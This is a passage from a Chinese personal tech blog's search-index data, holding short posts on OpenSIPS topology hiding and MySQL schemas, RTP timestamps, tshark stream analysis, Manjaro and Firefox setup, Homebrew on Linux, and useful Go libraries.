中间我自己给macbook换过一次电池,换电池之前只要不插电,macbook很容易就关机了 风扇经常转,噪音有点吵,我已经觉得无所谓了 17年买这台电脑的时候,应该是9400左右。配置应该是最低配的 i5双核2.3Ghz, 8G内存,128硬盘的。\n有些人可能惊讶,128G的硬盘怎么能够用的。但是我的确够用,我的磁盘还有将近50G的剩余空间呢。\n我不是视频或者影音工作者,用的软件比较少。整个应用程序所占用的空间才4个多G。剩下的文稿可能大部分是代码。\n由于我我基本上都是远程用ssh连上nuc上开发,所以mac上的资料更少。\n但是macbook键盘坏了这个问题,是不能忍的。偶尔要移动办工的时候,不可能再带个外接键盘吧。\n是时候准备和陪伴我4.5年的电脑说再见了。\n本来想买14寸的macbook pro m1的,但是重量的增加以及很丑的刘海也是我不能忍的。\n所以我觉得我会买一台轻便点的windows笔记本,而且windows还有一个很吸引我的点,就是linux子系统。这个linux子系统,要比mac的系统更加linux。\n各位同学有没有推荐的windows的轻便笔记本呢?","title":"macbook pro 使用1664天的感受"},{"content":"1. 拓扑隐藏功能 删除Via头 删除Route 删除Record-Route 修改Contact 可选隐藏Call-ID 如下图所示,根据SIP的Via, Route, Record-Route的头,往往可以推测服务内部的网络结构。\n我们不希望别人知道的我们的内部网络结构。我们只希望只能看到C这个sip server。经过拓扑隐藏过后\n用户看不到关于a、b的via, route, record-route头 用户看到的Contact头被修改成C的IP地址 可以选择把原始的Call-ID也修改 当然,拓扑隐藏除了可以隐藏一些信息,也有一个其他的好处:减少SIP消息包的长度。如果SIP消息用UDP传输,减少包的体积,可以大大降低UDP分片的可能性。\n所以,综上所述:拓扑隐藏有以下好处\n隐藏服务内部网络结构 减少SIP包的体积 2. 脚本例子 拓扑隐藏的实现并不复杂。首先要加载拓扑隐藏的模块\nloadmodule \u0026#34;topology_hiding.so\u0026#34; 2.1 初始化路由的处理 在初始化路由里,只需要调用topology_hiding()\nU 表示不隐藏Contact的用户名信息 C 表示隐藏Call-ID # if it\u0026#39;s an INVITE dialog, we can create the dialog now, will lead to cleaner SIP messages if (is_method(\u0026#34;INVITE\u0026#34;)) create_dialog(); # we do topology hiding, preserving the Contact Username and also hiding the Call-ID topology_hiding(\u0026#34;UC\u0026#34;); t_relay(); exit; 2.2 序列化路由的处理 在序列化请求中,只需要调用topology_hiding_match(), 后续的就可以交给OpenSIPS处理了。\nif (has_totag()) { if (topology_hiding_match()) { xlog(\u0026#34;Succesfully matched this request to a topology hiding dialog. \\n\u0026#34;); xlog(\u0026#34;Calller side callid is $ci \\n\u0026#34;); xlog(\u0026#34;Callee side callid is $TH_callee_callid \\n\u0026#34;); t_relay(); exit; } else { if ( is_method(\u0026#34;ACK\u0026#34;) ) { if ( t_check_trans() ) { t_relay(); exit; } else exit; } sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); exit; } } 2.3 注意事项 如果用了拓扑隐藏,就不要用record_route()用record_route_preset(), 去设置Record-Route头了,否则SIP消息将会在sip server上一只循环发送。\n4. 参考文档 https://www.opensips.org/Documentation/Tutorials-Topology-Hiding https://opensips.org/html/docs/modules/2.1.x/topology_hiding.html#idp256096 ","permalink":"https://wdd.js.org/opensips/ch8/topology-hiding/","summary":"1. 拓扑隐藏功能 删除Via头 删除Route 删除Record-Route 修改Contact 可选隐藏Call-ID 如下图所示,根据SIP的Via, Route, Record-Route的头,往往可以推测服务内部的网络结构。\n我们不希望别人知道的我们的内部网络结构。我们只希望只能看到C这个sip server。经过拓扑隐藏过后\n用户看不到关于a、b的via, route, record-route头 用户看到的Contact头被修改成C的IP地址 可以选择把原始的Call-ID也修改 当然,拓扑隐藏除了可以隐藏一些信息,也有一个其他的好处:减少SIP消息包的长度。如果SIP消息用UDP传输,减少包的体积,可以大大降低UDP分片的可能性。\n所以,综上所述:拓扑隐藏有以下好处\n隐藏服务内部网络结构 减少SIP包的体积 2. 脚本例子 拓扑隐藏的实现并不复杂。首先要加载拓扑隐藏的模块\nloadmodule \u0026#34;topology_hiding.so\u0026#34; 2.1 初始化路由的处理 在初始化路由里,只需要调用topology_hiding()\nU 表示不隐藏Contact的用户名信息 C 表示隐藏Call-ID # if it\u0026#39;s an INVITE dialog, we can create the dialog now, will lead to cleaner SIP messages if (is_method(\u0026#34;INVITE\u0026#34;)) create_dialog(); # we do topology hiding, preserving the Contact Username and also hiding the Call-ID topology_hiding(\u0026#34;UC\u0026#34;); t_relay(); exit; 2.","title":"拓扑隐藏学习以及实践"},{"content":"我有一个github仓库,https://github.com/wangduanduan/opensips, 这个源码比较大,git clone 比较慢。\n我们使用https://www.gitclone.com/提供的加速服务。\n# 从github上clone git clone https://github.com/wangduanduan/opensips.git # 从gitclone上clone # 只需要在github前面加上gitclone.com/ # 速度就非常快,达到1mb/s git clone https://gitclone.com/github.com/wangduanduan/opensips.git 但是这时候git repo的仓库地址是 https://gitclone.com/github.com/wangduanduan/opensips.git,并不是真正的仓库地址,而且我更喜欢用的是ssh方式的远程地址,所以我们就需要修改一下\ngit remote set-url origin git@github.com:wangduanduan/opensips.git ","permalink":"https://wdd.js.org/posts/2022/03/sny4rb/","summary":"我有一个github仓库,https://github.com/wangduanduan/opensips, 这个源码比较大,git clone 比较慢。\n我们使用https://www.gitclone.com/提供的加速服务。\n# 从github上clone git clone https://github.com/wangduanduan/opensips.git # 从gitclone上clone # 只需要在github前面加上gitclone.com/ # 速度就非常快,达到1mb/s git clone https://gitclone.com/github.com/wangduanduan/opensips.git 但是这时候git repo的仓库地址是 https://gitclone.com/github.com/wangduanduan/opensips.git,并不是真正的仓库地址,而且我更喜欢用的是ssh方式的远程地址,所以我们就需要修改一下\ngit remote set-url origin git@github.com:wangduanduan/opensips.git ","title":"github clone加速"},{"content":"故事发生在1988年的美国。这一年互联网的始祖网络,阿帕网已经诞生了将近20年。而我们所熟知的linux将在三年后,也就是1991才出现。\n在1988年,这时候的互联网只有阿帕网。 然而这个网络并没有想象中的那么好用,他还存在很多问题,而且也经常崩溃。\n解决阿帕网崩溃的这个问题,落到了LBL(Lawrence Berkeley National Laboratory实验室的肩上。\n这个实验室有四个牛人,他们同时也是tcpdump的发明人。\nVan Jacobson Sally Floyd Vern Paxson Steve McCanne 这个实验室主要的研究方向是TCP拥塞控制、BSD包过滤、VoIP等方向。\n为了解决阿帕网经常崩溃的问题,就必须要有一个好用的抓包工具。\n本着不重复造轮子的原则,这时候也已经又了一个叫做etherfind的工具,但是这个工具有以下的问题\n包过滤的语法非常蹩脚 协议编解码能力非常弱 性能也非常弱 总之一句话,他们认为etherfind不行。\n工欲善其事,必先利其器。所以他们就想创造一个新的工具。这个工具必须要有以下的特征\n能够从协议栈底层过滤包 把高级的过滤语法能够编译的底层的代码 能够在驱动层进行过滤 创建了一个内核模块叫做 Berkeley Packet Filter(BPF) 参考 https://baike.baidu.com/item/ARPAnet/3562284 ","permalink":"https://wdd.js.org/posts/2022/03/tcpdump/","summary":"故事发生在1988年的美国。这一年互联网的始祖网络,阿帕网已经诞生了将近20年。而我们所熟知的linux将在三年后,也就是1991才出现。\n在1988年,这时候的互联网只有阿帕网。 然而这个网络并没有想象中的那么好用,他还存在很多问题,而且也经常崩溃。\n解决阿帕网崩溃的这个问题,落到了LBL(Lawrence Berkeley National Laboratory实验室的肩上。\n这个实验室有四个牛人,他们同时也是tcpdump的发明人。\nVan Jacobson Sally Floyd Vern Paxson Steve McCanne 这个实验室主要的研究方向是TCP拥塞控制、BSD包过滤、VoIP等方向。\n为了解决阿帕网经常崩溃的问题,就必须要有一个好用的抓包工具。\n本着不重复造轮子的原则,这时候也已经又了一个叫做etherfind的工具,但是这个工具有以下的问题\n包过滤的语法非常蹩脚 协议编解码能力非常弱 性能也非常弱 总之一句话,他们认为etherfind不行。\n工欲善其事,必先利其器。所以他们就想创造一个新的工具。这个工具必须要有以下的特征\n能够从协议栈底层过滤包 把高级的过滤语法能够编译的底层的代码 能够在驱动层进行过滤 创建了一个内核模块叫做 Berkeley Packet Filter(BPF) 参考 https://baike.baidu.com/item/ARPAnet/3562284 ","title":"[未完成] 浪潮之底系列 - tcpdump的故事"},{"content":"wireshark安装之后,tshark也会自动安装。tshark也可以单独安装。\n如果我们想快速的分析语音刘相关的问题,可以参考下面的一个命令。\n语音卡顿,常见的原因就是网络丢包,tshark在命令行中快速输出语音流的丢包率。\n如下所示,rtp的丢包率分别是2.5%和4.6%。\ntshark -r abc.pcap -q -z rtp,streams ========================= RTP Streams ======================== Start time End time Src IP addr Port Dest IP addr Port SSRC Payload Pkts Lost Min Delta(ms) Mean Delta(ms) Max Delta(ms) Min Jitter(ms) Mean Jitter(ms) Max Jitter(ms) Problems? 2.666034 60.446026 192.168.69.12 18892 192.168.68.111 26772 0x76EFFF66 g711A 2807 72 (2.5%) 0.011 20.592 120.002 0.001 0.074 2.430 X 0.548952 60.467686 192.168.68.111 26772 192.168.69.12 18892 0xA655E7B6 g711A 2215 106 (4.6%) 9.520 21.202 219.777 0.055 6.781 256.014 X ============================================================== tshark的-z参数 -z参数可以用来提取各种统计数据。\n-z Get TShark to collect various types of statistics and display the result after finishing reading the capture file. Use the -q option if you’re reading a capture file and only want the statistics printed, not any per-packet information. Statistics are calculated independently of the normal per-packet output, unaffected by the main display filter. However, most have their own optional filter parameter, and only packets that match that filter (and any capture filter or read filter) will be used in the calculations. Note that the -z proto option is different - it doesn’t cause statistics to be gathered and printed when the capture is complete, it modifies the regular packet summary output to include the values of fields specified with the option. Therefore you must not use the -q option, as that option would suppress the printing of the regular packet summary output, and must also not use the -V option, as that would cause packet detail information rather than packet summary information to be printed. tshark -z help可以打\ntshark -z help 常用的\n-z conv,tcp-z conv,ip-z conv,udp-z endpoints,type[,filter]-z expert,sip-z sip,stat-z ip_hosts,tree-z rtp,streams\n","permalink":"https://wdd.js.org/opensips/tools/tshark/","summary":"wireshark安装之后,tshark也会自动安装。tshark也可以单独安装。\n如果我们想快速的分析语音刘相关的问题,可以参考下面的一个命令。\n语音卡顿,常见的原因就是网络丢包,tshark在命令行中快速输出语音流的丢包率。\n如下所示,rtp的丢包率分别是2.5%和4.6%。\ntshark -r abc.pcap -q -z rtp,streams ========================= RTP Streams ======================== Start time End time Src IP addr Port Dest IP addr Port SSRC Payload Pkts Lost Min Delta(ms) Mean Delta(ms) Max Delta(ms) Min Jitter(ms) Mean Jitter(ms) Max Jitter(ms) Problems? 2.666034 60.446026 192.168.69.12 18892 192.168.68.111 26772 0x76EFFF66 g711A 2807 72 (2.5%) 0.011 20.592 120.002 0.001 0.074 2.430 X 0.548952 60.467686 192.168.68.111 26772 192.168.69.12 18892 0xA655E7B6 g711A 2215 106 (4.","title":"tshark 快速分析语音流问题"},{"content":"对于浏览器,我有以下几个需求\n能在所有平台上运行,包括mac, windows, linux, ios, 安卓 能够非常方便的同步浏览器之间的数据,例如书签之类的 能够很方便的安装扩展程序,无需翻墙 按照这些条件,只有Firefox能否满足。\n当然安装使用Firefox的时候,也出现了几小插曲。\nmacos 我在ios上登录Firefox上的账户,在MacOS的Firefox却无法登陆,查了才发现,原来FireFox的账号分为国内版和国际版,两者之间数据不通,所以在macos上,也要登陆国内版本,就是带有火狐通行证的登陆页面。\n需要在同步页面点击切换至本地服务。\nlinux/manjaro manjaro上安装的firefox居然没有切换本地服务这个选项,后来发现这个浏览器上没有附加组件管理器所以需要去 http://mozilla.com.cn/moz-addon.html, 安装好附加组件管理器,登陆的时候,应该就可以跳转到带有火狐通行证的登陆页面了。\n","permalink":"https://wdd.js.org/posts/2020/02/yva0h1/","summary":"对于浏览器,我有以下几个需求\n能在所有平台上运行,包括mac, windows, linux, ios, 安卓 能够非常方便的同步浏览器之间的数据,例如书签之类的 能够很方便的安装扩展程序,无需翻墙 按照这些条件,只有Firefox能否满足。\n当然安装使用Firefox的时候,也出现了几小插曲。\nmacos 我在ios上登录Firefox上的账户,在MacOS的Firefox却无法登陆,查了才发现,原来FireFox的账号分为国内版和国际版,两者之间数据不通,所以在macos上,也要登陆国内版本,就是带有火狐通行证的登陆页面。\n需要在同步页面点击切换至本地服务。\nlinux/manjaro manjaro上安装的firefox居然没有切换本地服务这个选项,后来发现这个浏览器上没有附加组件管理器所以需要去 http://mozilla.com.cn/moz-addon.html, 安装好附加组件管理器,登陆的时候,应该就可以跳转到带有火狐通行证的登陆页面了。","title":"为什么我又开始使用Firefox浏览器"},{"content":"1. datamash https://www.gnu.org/software/datamash/ 能够方便的计算数据的平均值,最大值,最小值等数据。\n2. textsql https://github.com/dinedal/textql 能够方便的对csv文件做sql查询\n3. graph-cli https://github.com/mcastorina/graph-cli 能够直接读取csv文件,然后绘图。\n","permalink":"https://wdd.js.org/posts/2022/02/","summary":"1. datamash https://www.gnu.org/software/datamash/ 能够方便的计算数据的平均值,最大值,最小值等数据。\n2. textsql https://github.com/dinedal/textql 能够方便的对csv文件做sql查询\n3. graph-cli https://github.com/mcastorina/graph-cli 能够直接读取csv文件,然后绘图。","title":"有意思的命令行工具"},{"content":"OpenSIPS需要用数据库持久化数据,常用的是mysql。\n可以参考这个官方的教程去初始化数据库的数据 https://www.opensips.org/Documentation/Install-DBDeployment-2-4\n如果你想自己创建语句,也是可以的,实际上建表语句在OpenSIPS安装之后,已经被保存在你的电脑上。\n一般位于 /usr/local/share/opensips/mysql 目录中\ncd /usr/local/share/opensips/mysql ls acc-create.sql call_center-create.sql dispatcher-create.sql group-create.sql rls-create.sql uri_db-create.sql alias_db-create.sql carrierroute-create.sql domain-create.sql imc-create.sql rtpengine-create.sql userblacklist-create.sql auth_db-create.sql closeddial-create.sql domainpolicy-create.sql load_balancer-create.sql rtpproxy-create.sql usrloc-create.sql avpops-create.sql clusterer-create.sql drouting-create.sql msilo-create.sql siptrace-create.sql b2b-create.sql cpl-create.sql emergency-create.sql permissions-create.sql speeddial-create.sql b2b_sca-create.sql dialog-create.sql fraud_detection-create.sql presence-create.sql standard-create.sql cachedb_sql-create.sql dialplan-create.sql freeswitch_scripting-create.sql registrant-create.sql tls_mgm-create.sql ","permalink":"https://wdd.js.org/opensips/ch5/sql-table/","summary":"OpenSIPS需要用数据库持久化数据,常用的是mysql。\n可以参考这个官方的教程去初始化数据库的数据 https://www.opensips.org/Documentation/Install-DBDeployment-2-4\n如果你想自己创建语句,也是可以的,实际上建表语句在OpenSIPS安装之后,已经被保存在你的电脑上。\n一般位于 /usr/local/share/opensips/mysql 目录中\ncd /usr/local/share/opensips/mysql ls acc-create.sql call_center-create.sql dispatcher-create.sql group-create.sql rls-create.sql uri_db-create.sql alias_db-create.sql carrierroute-create.sql domain-create.sql imc-create.sql rtpengine-create.sql userblacklist-create.sql auth_db-create.sql closeddial-create.sql domainpolicy-create.sql load_balancer-create.sql rtpproxy-create.sql usrloc-create.sql avpops-create.sql clusterer-create.sql drouting-create.sql msilo-create.sql siptrace-create.sql b2b-create.sql cpl-create.sql emergency-create.sql permissions-create.sql speeddial-create.sql b2b_sca-create.sql dialog-create.sql fraud_detection-create.sql presence-create.sql standard-create.sql cachedb_sql-create.sql dialplan-create.sql freeswitch_scripting-create.sql registrant-create.sql tls_mgm-create.sql ","title":"mysql建表语句"},{"content":"1. 安装vivaldi浏览器 pamac install vivaldi 参考:https://wiki.manjaro.org/index.php/Vivaldi_Browser\n2. 关闭三次密码错误锁定 修改/etc/security/faillock.conf, 将其中的deny取消注释,并改为0,然后注销。重新登录。\ndeny = 0 3. 禁用大写锁定键 在输入设备中,选择键盘-》高级》 Caps Lock行为, 选中Caps Lock被禁用, 然后应用。\n","permalink":"https://wdd.js.org/posts/2022/01/","summary":"1. 安装vivaldi浏览器 pamac install vivaldi 参考:https://wiki.manjaro.org/index.php/Vivaldi_Browser\n2. 关闭三次密码错误锁定 修改/etc/security/faillock.conf, 将其中的deny取消注释,并改为0,然后注销。重新登录。\ndeny = 0 3. 禁用大写锁定键 在输入设备中,选择键盘-》高级》 Caps Lock行为, 选中Caps Lock被禁用, 然后应用。","title":"manjaro kde 之旅"},{"content":"最近遇到一些和媒体流相关的问题,使用wireshark分析之后,总算有些眉目。然而我深感对RTP协议的理解,还是趋于表面。所以我决定,深入的学习一下RTP协议。\n和rtp相关的协议有两个rfc, 分别是\n1996的的 RFC 1889 2003年的 RFC 3550 RFC 3550是对RFC 1889的稍微改进,然而大体上是没什么改变的。所以我们可以直接看RFC 3550。\nRTP 底层用的是UDP协议 RTP 的使用场景是传输实时数据,例如语音,视频,模拟数据等等 RTP 并不保证QoS Synchronization source (SSRC): The source of a stream of RTP packets, identified by a 32-bit numeric SSRC identifier carried in the RTP header so as not to be dependent upon the network address. All packets from a synchronization source form part of the same timing and sequence number space, so a receiver groups packets by synchronization source for playback. Examples of synchronization sources include the sender of a stream of packets derived from a signal source such as a microphone or a camera, or an RTP mixer (see below). A synchronization source may change its data format, e.g., audio encoding, over time. The SSRC identifier is a randomly chosen value meant to be globally unique within a particular RTP session (see Section 8). A participant need not use the same SSRC identifier for all the RTP sessions in a multimedia session; the binding of the SSRC identifiers is provided through RTCP (see Section 6.5.1). If a participant generates multiple streams in one RTP session, for example from separate video cameras, each MUST be identified as a different SSRC.\nThe first twelve octets are present in every RTP packet, while the list of CSRC identifiers is present only when inserted by a mixer. The fields have the following meaning:\nversion (V): 2 bits This field identifies the version of RTP. The version defined by this specification is two (2). (The value 1 is used by the first draft version of RTP and the value 0 is used by the protocol initially implemented in the \u0026ldquo;vat\u0026rdquo; audio tool.)\npadding (P): 1 bit If the padding bit is set, the packet contains one or more additional padding octets at the end which are not part of the payload. The last octet of the padding contains a count of how many padding octets should be ignored, including itself. Padding may be needed by some encryption algorithms with fixed block sizes or for carrying several RTP packets in a lower-layer protocol data unit.\nextension (X): 1 bit If the extension bit is set, the fixed header MUST be followed by exactly one header extension, with a format defined in Section 5.3.1.\nCSRC count (CC): 4 bits The CSRC count contains the number of CSRC identifiers that follow the fixed header.\nmarker (M): 1 bit The interpretation of the marker is defined by a profile. It is intended to allow significant events such as frame boundaries to be marked in the packet stream. A profile MAY define additional marker bits or specify that there is no marker bit by changing the number of bits in the payload type field (see Section 5.3).\npayload type (PT): 7 bits This field identifies the format of the RTP payload and determines its interpretation by the application. A profile MAY specify a default static mapping of payload type codes to payload formats. Additional payload type codes MAY be defined dynamically through non-RTP means (see Section 3). A set of default mappings for audio and video is specified in the companion RFC 3551 [1]. An RTP source MAY change the payload type during a session, but this field SHOULD NOT be used for multiplexing separate media streams (see Section 5.2). A receiver MUST ignore packets with payload types that it does not understand.\nsequence number: 16 bits The sequence number increments by one for each RTP data packet sent, and may be used by the receiver to detect packet loss and to restore packet sequence. The initial value of the sequence number SHOULD be random (unpredictable) to make known-plaintext attacks on encryption more difficult, even if the source itself does not encrypt according to the method in Section 9.1, because the packets may flow through a translator that does. Techniques for choosing unpredictable numbers are discussed in [17].\ntimestamp: 32 bits 最重要的就是这个字段,需要认证理解。\ntimestamp的初始值是一个随机值,而不是linux时间戳 timestamp反应的是rtp采样数据的一个字节的采样时刻 对于相同的rtp流来说,timestamp总是线性按照固定的长度增长,一般是160。采样频率一般是8000hz, 也就是说1秒会有8000个样本数据,每个样本占用1个字节。发送方一般每隔20毫秒发送一个20毫秒内的所有采样数据。那么一秒钟发送方会发送1000/20=50个RTP包,50个数据包发送8000个采样数据,平均每隔数据包携带8000/50=160个字节的数据。所以timestamp的增量一般是160, 在wireshark上抓包,可以看到rtc流的time字段是按照160的步长在增加。 然后我们分析单个的RTP流,从IP层可以看出UDP payload是172个字节,实际上就是rtp的采样数据160 + RTP的固定的12字节的头部 但是也有时候, timestamp也并不是总是按照固定的步长再增长,例如下图,3166508092的下一个包的Time字段突然变成1307389520了。这种情况比较特殊,一般是多个不同SSRC的语音流再经过同一个SBC时,SSRC被修改成相同的值,但是timestamp字段是原样保留的。导致发出的RTP流timestamp字段不再连续。在wireshark的流分析上,也能看出出现了不正常的timestamp。这种不正常的timestamp对于某些sipua来说,它可能会忽略不连续的所有后续的RTP包,进而导致无法放音的问题。我就层遇到过fs类似的问题,一个解决方案是升级fs, 另一个方案是试下 fs的rtp_rewrite_timestamps通道变量为true。https://freeswitch.org/confluence/display/FREESWITCH/rtp_rewrite_timestamps The timestamp reflects the sampling instant of the first octet in the RTP data packet. The sampling instant MUST be derived from a clock that increments monotonically and linearly in time to allow synchronization and jitter calculations (see Section 6.4.1). The resolution of the clock MUST be sufficient for the desired synchronization accuracy and for measuring packet arrival jitter (one tick per video frame is typically not sufficient). The clock frequency is dependent on the format of data carried as payload and is specified statically in the profile or payload format specification that defines the format, or MAY be specified dynamically for payload formats defined through non-RTP means. If RTP packets are generated periodically, the nominal sampling instant as determined from the sampling clock is to be used, not a reading of the system clock. As an example, for fixed-rate audio the timestamp clock would likely increment by one for each sampling period. If an audio application reads blocks covering 160 sampling periods from the input device, the timestamp would be increased by 160 for each such block, regardless of whether the block is transmitted in a packet or dropped as silent. The initial value of the timestamp SHOULD be random, as for the sequence number. Several consecutive RTP packets will have equal timestamps if they are (logically) generated at once, e.g., belong to the same video frame. Consecutive RTP packets MAY contain timestamps that are not monotonic if the data is not transmitted in the order it was sampled, as in the case of MPEG interpolated video frames. (The sequence numbers of the packets as transmitted will still be monotonic.) RTP timestamps from different media streams may advance at different rates and usually have independent, random offsets. Therefore, although these timestamps are sufficient to reconstruct the timing of a single stream, directly comparing RTP timestamps from different media is not effective for synchronization. Instead, for each medium the RTP timestamp is related to the sampling instant by pairing it with a timestamp from a reference clock (wallclock) that represents the time when the data corresponding to the RTP timestamp was sampled. The reference clock is shared by all media to be synchronized. The timestamp pairs are not transmitted in every data packet, but at a lower rate in RTCP SR packets as described in Section 6.4. The sampling instant is chosen as the point of reference for the RTP timestamp because it is known to the transmitting endpoint and has a common definition for all media, independent of encoding delays or other processing. The purpose is to allow synchronized presentation of all media sampled at the same time. Applications transmitting stored data rather than data sampled in real time typically use a virtual presentation timeline derived from wallclock time to determine when the next frame or other unit of each medium in the stored data should be presented. In this case, the RTP timestamp would reflect the presentation time for each unit. That is, the RTP timestamp for each unit would be related to the wallclock time at which the unit becomes current on the virtual presentation timeline. Actual presentation occurs some time later as determined by the receiver. An example describing live audio narration of prerecorded video illustrates the significance of choosing the sampling instant as the reference point. In this scenario, the video would be presented locally for the narrator to view and would be simultaneously transmitted using RTP. The \u0026ldquo;sampling instant\u0026rdquo; of a video frame transmitted in RTP would be established by referencing\nits timestamp to the wallclock time when that video frame was presented to the narrator. The sampling instant for the audio RTP packets containing the narrator\u0026rsquo;s speech would be established by referencing the same wallclock time when the audio was sampled. The audio and video may even be transmitted by different hosts if the reference clocks on the two hosts are synchronized by some means such as NTP. A receiver can then synchronize presentation of the audio and video packets by relating their RTP timestamps using the timestamp pairs in RTCP SR packets.\nSSRC: 32 bits The SSRC field identifies the synchronization source. This identifier SHOULD be chosen randomly, with the intent that no two synchronization sources within the same RTP session will have the same SSRC identifier. An example algorithm for generating a random identifier is presented in Appendix A.6. Although the probability of multiple sources choosing the same identifier is low, all RTP implementations must be prepared to detect and resolve collisions. Section 8 describes the probability of collision along with a mechanism for resolving collisions and detecting RTP-level forwarding loops based on the uniqueness of the SSRC identifier. If a source changes its source transport address, it must also choose a new SSRC identifier to avoid being interpreted as a looped source (see Section 8.2).\nCSRC list: 0 to 15 items, 32 bits each The CSRC list identifies the contributing sources for the payload contained in this packet. The number of identifiers is given by the CC field. If there are more than 15 contributing sources, only 15 can be identified. CSRC identifiers are inserted by mixers (see Section 7.1), using the SSRC identifiers of contributing sources. For example, for audio packets the SSRC identifiers of all sources that were mixed together to create a packet are listed, allowing correct talker indication at the receiver.\n参考文档 http://www.rfcreader.com/#rfc3550 http://www.rfcreader.com/#rfc1889 ","permalink":"https://wdd.js.org/opensips/ch4/rtp-timestamp/","summary":"最近遇到一些和媒体流相关的问题,使用wireshark分析之后,总算有些眉目。然而我深感对RTP协议的理解,还是趋于表面。所以我决定,深入的学习一下RTP协议。\n和rtp相关的协议有两个rfc, 分别是\n1996的的 RFC 1889 2003年的 RFC 3550 RFC 3550是对RFC 1889的稍微改进,然而大体上是没什么改变的。所以我们可以直接看RFC 3550。\nRTP 底层用的是UDP协议 RTP 的使用场景是传输实时数据,例如语音,视频,模拟数据等等 RTP 并不保证QoS Synchronization source (SSRC): The source of a stream of RTP packets, identified by a 32-bit numeric SSRC identifier carried in the RTP header so as not to be dependent upon the network address. All packets from a synchronization source form part of the same timing and sequence number space, so a receiver groups packets by synchronization source for playback.","title":"RTP 不连续的timestamp和SSRC"},{"content":"要求 [必须] 能够保存密码, 或者用私钥登录 [必须] 能够支持ftp/sftp [必须] 开源免费 [必须] 界面漂亮,支持中文字符 [可选] 支持同步ssh配置 [必须] 支持跨平台 Tabby A terminal for a more modern age (formerly Terminus) https://github.com/Eugeny/tabby https://tabby.sh/ 25.7k Star 基于electron, 主要开发语言typescript\nElecterm Terminal/ssh/sftp client(linux, mac, win) https://github.com/electerm/electerm https://electerm.github.io/electerm/ 4.8k star 基于electron, 主要开发语言javascript\nWindTerm A Quicker and better SSH/Telnet/Serial/Shell/Sftp client for DevOps.\nhttps://github.com/kingToolbox/WindTerm 2.6K star 主要开发语言: C\n","permalink":"https://wdd.js.org/posts/2021/12/","summary":"要求 [必须] 能够保存密码, 或者用私钥登录 [必须] 能够支持ftp/sftp [必须] 开源免费 [必须] 界面漂亮,支持中文字符 [可选] 支持同步ssh配置 [必须] 支持跨平台 Tabby A terminal for a more modern age (formerly Terminus) https://github.com/Eugeny/tabby https://tabby.sh/ 25.7k Star 基于electron, 主要开发语言typescript\nElecterm Terminal/ssh/sftp client(linux, mac, win) https://github.com/electerm/electerm https://electerm.github.io/electerm/ 4.8k star 基于electron, 主要开发语言javascript\nWindTerm A Quicker and better SSH/Telnet/Serial/Shell/Sftp client for DevOps.\nhttps://github.com/kingToolbox/WindTerm 2.6K star 主要开发语言: C","title":"开源免费的ssh终端工具"},{"content":"11月2号,我的主力开发工具macbook开始退役。\n我换了nuc11 i7, 安装了国产的deepin(深度)操作系统。总体体验蛮好的,只是apt-get的软件包里,太多都是很老的包。所以我想到以前用mac的包管理工具homebrew, 据说它不仅仅可以在mac上工作,主流的linux也是能够使用的。\nhomebrew的介绍是:The Missing Package Manager for macOS (or Linux)。也就是说brew完全可以在linux上运行。\n安装方式也很简单:\n/bin/bash -c \u0026#34;$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\u0026#34; 上面的shell执行之后,brew就安装成功了。\n和mac不同的是,linux homebrew的安装包的可执行命令的目录是:/home/linuxbrew/.linuxbrew/bin, 所以需要把它加入到PATH中,安装的软件才能正确执行。\n参考 https://brew.sh/ ","permalink":"https://wdd.js.org/posts/2021/11/","summary":"11月2号,我的主力开发工具macbook开始退役。\n我换了nuc11 i7, 安装了国产的deepin(深度)操作系统。总体体验蛮好的,只是apt-get的软件包里,太多都是很老的包。所以我想到以前用mac的包管理工具homebrew, 据说它不仅仅可以在mac上工作,主流的linux也是能够使用的。\nhomebrew的介绍是:The Missing Package Manager for macOS (or Linux)。也就是说brew完全可以在linux上运行。\n安装方式也很简单:\n/bin/bash -c \u0026#34;$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\u0026#34; 上面的shell执行之后,brew就安装成功了。\n和mac不同的是,linux homebrew的安装包的可执行命令的目录是:/home/linuxbrew/.linuxbrew/bin, 所以需要把它加入到PATH中,安装的软件才能正确执行。\n参考 https://brew.sh/ ","title":"使用brew作为deepin的包管理工具"},{"content":"web框架 https://github.com/gofiber/fiber http client https://github.com/go-resty/resty mock https://github.com/jarcoal/httpmock 项目结构 https://github.com/golang-standards/project-layout 环境变量操作 https://github.com/caarlos0/env https://github.com/kelseyhightower/envconfig 测试框架 https://github.com/stretchr/testify 日志框架 https://github.com/uber-go/zap html解析 https://github.com/PuerkitoBio/goquery cli工具 https://github.com/urfave/cli 各种库大全集 https://github.com/avelino/awesome-go 终端颜色 https://github.com/fatih/color 剪贴板 https://github.com/atotto/clipboard 数据库驱动 https://github.com/go-sql-driver/mysql 热重载 https://github.com/cosmtrek/air 时间处理 https://github.com/golang-module/carbon 错误封装 https://github.com/pkg/errors 结构体转二进制 https://github.com/lunixbochs/struc VIM智能补全提示 需要安装coc-go, 还有vim-go\n","permalink":"https://wdd.js.org/golang/my-start-repo/","summary":"web框架 https://github.com/gofiber/fiber http client https://github.com/go-resty/resty mock https://github.com/jarcoal/httpmock 项目结构 https://github.com/golang-standards/project-layout 环境变量操作 https://github.com/caarlos0/env https://github.com/kelseyhightower/envconfig 测试框架 https://github.com/stretchr/testify 日志框架 https://github.com/uber-go/zap html解析 https://github.com/PuerkitoBio/goquery cli工具 https://github.com/urfave/cli 各种库大全集 https://github.com/avelino/awesome-go 终端颜色 https://github.com/fatih/color 剪贴板 https://github.com/atotto/clipboard 数据库驱动 https://github.com/go-sql-driver/mysql 热重载 https://github.com/cosmtrek/air 时间处理 https://github.com/golang-module/carbon 错误封装 https://github.com/pkg/errors 结构体转二进制 https://github.com/lunixbochs/struc VIM智能补全提示 需要安装coc-go, 还有vim-go","title":"我常用的第三方库"},{"content":" Error EXTRA *mysql.MySQLError=Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0026lsquo;? ( 然而我仔细看了看sql语句,没有看出来究竟哪里有sql报错。\n然而当我把作为placeholder的问号去掉,直接用表的名字,sql是可以直接执行的。我意识到这个可能是和placeholder有关。\n搜索了一下,看到一个链接 https://github.com/go-sql-driver/mysql/issues/848\nPlaceholder can\u0026rsquo;t be used for table name or column name. It\u0026rsquo;s MySQL spec. Not bug of this project.\n大意是说,placeholder是不能作为表名或者列名的。\n在mysql关于prepared文档介绍中,在允许使用prepared的语句里,没有看到create table可以用placeholder 